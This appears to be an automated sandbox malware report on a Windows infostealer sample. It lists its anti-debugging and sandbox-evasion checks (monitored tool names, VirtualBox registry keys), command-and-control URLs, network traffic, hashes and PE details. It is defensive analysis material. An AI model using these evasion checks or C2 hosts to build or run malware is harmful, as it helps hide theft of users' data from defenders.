Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0058255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0058255D
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_005829FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_005829FF
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeCode function: 0_2_0058255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0058255D
Source: Bo6uO5gKL4.exe, Bo6uO5gKL4.exe, 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Bo6uO5gKL4.exe, 00000000.00000003.1599494153.0000000001853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Bo6uO5gKL4.exeBinary or memory string: Hyper-V RAW
Source: Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Bo6uO5gKL4.exe, 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Bo6uO5gKL4.exe, 00000000.00000002.1675761192.00000000018B7000.00000004.00000020.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000003.1669742313.00000000018B1000.00000004.00000020.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000003.1670267128.00000000018B2000.00000004.00000020.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000003.1669712974.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000003.1670311640.00000000018B6000.00000004.00000020.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000003.1669640558.000000000187B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeFile opened: NTICE
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeFile opened: SICE
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeProcess queried: DebugPortJump to behavior
Source: Bo6uO5gKL4.exe, Bo6uO5gKL4.exe, 00000000.00000002.1674797118.0000000000E59000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ^^Program Manager
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.9:49706 -> 34.147.147.173:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping741
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Bo6uO5gKL4.exe47%ReversingLabsWin32.Infostealer.Tinba
Bo6uO5gKL4.exe44%VirustotalBrowse
Bo6uO5gKL4.exe100%AviraTR/Crypt.TPM.Gen
Bo6uO5gKL4.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah100%Avira URL Cloudmalware
http://home.fortth14vs.top/gduZ100%Avira URL Cloudmalware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0100%Avira URL Cloudmalware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738100%Avira URL Cloudmalware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18100%Avira URL Cloudmalware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0tsi100%Avira URL Cloudmalware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fortth14vs.top
34.147.147.173
truefalse
    		high
    fp2e7a.wpc.phicdn.net
    		192.229.221.95
    		truefalse
      		high
      httpbin.org
      		34.200.57.114
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0true
        • Avira URL Cloud: malware
        		unknown
        http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738true
        • Avira URL Cloud: malware
        		unknown
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlBo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            http://html4/loose.dtdBo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              https://httpbin.org/ipbeforeBo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMahBo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://curl.se/docs/http-cookies.htmlBo6uO5gKL4.exe, Bo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpfalse
                  		high
                  http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://curl.se/docs/hsts.html#Bo6uO5gKL4.exefalse
                    		high
                    http://home.fortth14vs.top/gduZBo6uO5gKL4.exe, 00000000.00000003.1669640558.000000000187B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0tsiBo6uO5gKL4.exe, 00000000.00000002.1675408659.000000000181E000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963Bo6uO5gKL4.exe, 00000000.00000002.1675408659.000000000184B000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://curl.se/docs/alt-svc.htmlBo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high
                      http://.cssBo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://.jpgBo6uO5gKL4.exe, 00000000.00000003.1581992204.000000000761F000.00000004.00001000.00020000.00000000.sdmp, Bo6uO5gKL4.exe, 00000000.00000002.1674269432.0000000000B60000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          34.147.147.173
                          		home.fortth14vs.topUnited States
                          		2686ATGS-MMD-ASUSfalse
                          34.200.57.114
                          		httpbin.orgUnited States
                          		14618AMAZON-AESUSfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1582826
                          Start date and time:2024-12-31 15:40:33 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 5m 3s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:3
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Bo6uO5gKL4.exe
                          renamed because original name is a hash value
                          Original Sample Name:935d1fe58326c50f930c94e3493b266c.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:Failed
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                          • Excluded IPs from analysis (whitelisted): 20.109.210.53
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                          Simulations

                          Behavior and APIs

                          No simulations

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          34.200.57.114JbN2WYseAr.exeGet hashmaliciousUnknownBrowse
                            r8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                              ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                home.fortth14vs.topr8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                                • 91.149.241.220
                                yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                                • 91.149.241.220
                                ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                • 91.149.241.220
                                Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                                • 91.149.241.220
                                fp2e7a.wpc.phicdn.netvEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                • 192.229.221.95
                                BEncode Editor.exeGet hashmaliciousUnknownBrowse
                                • 192.229.221.95
                                valyzt.msiGet hashmaliciousXRedBrowse
                                • 192.229.221.95
                                docx.msiGet hashmaliciousXRedBrowse
                                • 192.229.221.95
                                SecuredOnedrive.ClientSetup.exeGet hashmaliciousScreenConnect ToolBrowse
                                • 192.229.221.95
                                dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                • 192.229.221.95
                                KL-3.1.16.exeGet hashmaliciousNitol, ZegostBrowse
                                • 192.229.221.95
                                2GL073z1wL.exeGet hashmaliciousUnknownBrowse
                                • 192.229.221.95
                                installer64v1.0.0.msiGet hashmaliciousUnknownBrowse
                                • 192.229.221.95
                                test5.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                • 192.229.221.95
                                httpbin.orgJbN2WYseAr.exeGet hashmaliciousUnknownBrowse
                                • 34.200.57.114
                                r8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                                • 34.200.57.114
                                yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                                • 34.197.122.172
                                ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                                • 34.200.57.114
                                ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                • 34.197.122.172
                                Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                                • 34.197.122.172
                                Set-up.exeGet hashmaliciousUnknownBrowse
                                • 52.202.253.164
                                Set-up.exeGet hashmaliciousUnknownBrowse
                                • 34.197.122.172
                                Set-up.exeGet hashmaliciousUnknownBrowse
                                • 52.73.63.247
                                a2mNMrPxow.exeGet hashmaliciousUnknownBrowse
                                • 3.218.7.103

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                AMAZON-AESUSJbN2WYseAr.exeGet hashmaliciousUnknownBrowse
                                • 34.200.57.114
                                r8nllkNEQX.exeGet hashmaliciousUnknownBrowse
                                • 34.200.57.114
                                yqUQPPp0LM.exeGet hashmaliciousUnknownBrowse
                                • 34.197.122.172
                                ivHDHq51Ar.exeGet hashmaliciousUnknownBrowse
                                • 34.200.57.114
                                ZN34wF8WI2.exeGet hashmaliciousUnknownBrowse
                                • 34.197.122.172
                                Hqle5OSmLQ.exeGet hashmaliciousUnknownBrowse
                                • 34.197.122.172
                                PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                • 44.221.84.105
                                http://ghostbin.cafe24.com/Get hashmaliciousUnknownBrowse
                                • 44.199.56.69
                                Set-up.exeGet hashmaliciousUnknownBrowse
                                • 52.202.253.164
                                kwari.mips.elfGet hashmaliciousUnknownBrowse
                                • 54.226.65.111
                                ATGS-MMD-ASUShttp://usps.com-trackaddn.top/lGet hashmaliciousUnknownBrowse
                                • 34.54.88.138
                                cbr.x86.elfGet hashmaliciousMiraiBrowse
                                • 57.13.227.38
                                https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
                                • 34.36.178.232
                                kwari.ppc.elfGet hashmaliciousUnknownBrowse
                                • 48.233.101.215
                                kwari.arm.elfGet hashmaliciousUnknownBrowse
                                • 57.204.182.195
                                kwari.mpsl.elfGet hashmaliciousUnknownBrowse
                                • 57.206.149.213
                                kwari.arm7.elfGet hashmaliciousMiraiBrowse
                                • 34.31.161.194
                                https://tepco-jp-lin;.%5Dshop/co/tepcoGet hashmaliciousUnknownBrowse
                                • 57.182.72.119
                                botx.mips.elfGet hashmaliciousMiraiBrowse
                                • 32.75.183.191
                                botx.sh4.elfGet hashmaliciousMiraiBrowse
                                • 48.108.128.188

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                Entropy (8bit):7.988218247487919
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • VXD Driver (31/22) 0.00%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:Bo6uO5gKL4.exe
                                File size:4'494'336 bytes
                                MD5:935d1fe58326c50f930c94e3493b266c
                                SHA1:cd649b9eaae16dc9457c388970427710e485eb9c
                                SHA256:ad2f45143de4a73f40010ac03e0aff210dcf24dfc8b0fffba678c3e9f20d5e22
                                SHA512:8477dfd72a20789e4aa0bc74c9513a7b1c0c7689338879653694c9de5a6360c55f3da88527f43c9c3c194a2e19dd703005f90fd51aa8c3b9992922f0c3647ed8
                                SSDEEP:98304:TqLg5Jh20djlrckiJMxKsoWsZZngNgGgtMFpcd7f+Mo39jBXRRjp8C:Wczhpdjlrc1uKahNVsMncd7fnoNV/O
                                TLSH:DD2633DAD2B1B0FFC89563324F6698C585FEDD3CB44DD267B50385A2B8927F20906AD0
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M...w..2...0........M...@..........................`........D...@... ............................

                                File Icon

                                Icon Hash:00928e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x10a3000
                                Entrypoint Section:.taggant
                                Digitally signed:true
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                DLL Characteristics:DYNAMIC_BASE
                                Time Stamp:0x677235C4 [Mon Dec 30 05:55:16 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                Authenticode Signature

                                Signature Valid:
                                Signature Issuer:
                                Signature Validation Error:
                                Error Number:
                                Not Before, Not After
                                  Subject Chain
                                    Version:
                                    Thumbprint MD5:
                                    Thumbprint SHA-1:
                                    Thumbprint SHA-256:
                                    Serial:

                                    Entrypoint Preview

                                    Instruction
                                    jmp 00007FAAACC42CDAh

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x74c05f0x73.idata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x74b0000x2b0.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x7782000x688
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xca13c00x10nlrwmcpx
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0xca13700x18nlrwmcpx
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    0x10000x74a0000x2890002ab766a994316c93ee68540303046ceaunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x74b0000x2b00x2005c0b3fa502004abd7bfd7c12d4ff2913False0.796875data6.052531537872281IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .idata 0x74c0000x10000x20052564c2cea63394dbc4e71775ebabcc0False0.166015625data1.1589685166080708IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    0x74d0000x3980000x20038d1c15f1492d15fdd090b47289478feunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    nlrwmcpx0xae50000x1bd0000x1bc8004cd5cf0b57fa4791f7fd9954faf7fb7eFalse0.994404263920135data7.955790238153636IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    gbteqlgw0xca20000x10000x40015be36eea9de8864f6d564fc6fa3e193False0.8251953125data6.44680547012041IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .taggant0xca30000x30000x2200c698845e34a16a1c124bf2b2e494ef12False0.0700827205882353DOS executable (COM)0.7583761956079828IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_MANIFEST0xca13d00x256ASCII text, with CRLF line terminators0.5100334448160535

                                    Imports

                                    DLLImport
                                    kernel32.dlllstrcpy

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 31, 2024 15:41:57.412885904 CET49705443192.168.2.934.200.57.114
                                    Dec 31, 2024 15:41:57.412944078 CET4434970534.200.57.114192.168.2.9
                                    Dec 31, 2024 15:41:57.413014889 CET49705443192.168.2.934.200.57.114
                                    Dec 31, 2024 15:41:57.424616098 CET49705443192.168.2.934.200.57.114
                                    Dec 31, 2024 15:41:57.424628019 CET4434970534.200.57.114192.168.2.9
                                    Dec 31, 2024 15:41:58.093822956 CET4434970534.200.57.114192.168.2.9
                                    Dec 31, 2024 15:41:58.094583035 CET49705443192.168.2.934.200.57.114
                                    Dec 31, 2024 15:41:58.094603062 CET4434970534.200.57.114192.168.2.9
                                    Dec 31, 2024 15:41:58.096095085 CET4434970534.200.57.114192.168.2.9
                                    Dec 31, 2024 15:41:58.096178055 CET49705443192.168.2.934.200.57.114
                                    Dec 31, 2024 15:41:58.097635031 CET49705443192.168.2.934.200.57.114
                                    Dec 31, 2024 15:41:58.097708941 CET4434970534.200.57.114192.168.2.9
                                    Dec 31, 2024 15:41:58.108655930 CET49705443192.168.2.934.200.57.114
                                    Dec 31, 2024 15:41:58.108669043 CET4434970534.200.57.114192.168.2.9
                                    Dec 31, 2024 15:41:58.159591913 CET49705443192.168.2.934.200.57.114
                                    Dec 31, 2024 15:41:58.209000111 CET4434970534.200.57.114192.168.2.9
                                    Dec 31, 2024 15:41:58.209106922 CET4434970534.200.57.114192.168.2.9
                                    Dec 31, 2024 15:41:58.209217072 CET49705443192.168.2.934.200.57.114
                                    Dec 31, 2024 15:41:58.218745947 CET49705443192.168.2.934.200.57.114
                                    Dec 31, 2024 15:41:58.218765020 CET4434970534.200.57.114192.168.2.9
                                    Dec 31, 2024 15:41:59.738719940 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.743556976 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.743634939 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.750154018 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.755065918 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.755079031 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.755106926 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.755116940 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.755131960 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.755189896 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.755194902 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.755218983 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.755235910 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.755239964 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.755245924 CET804970634.147.147.173192.168.2.9
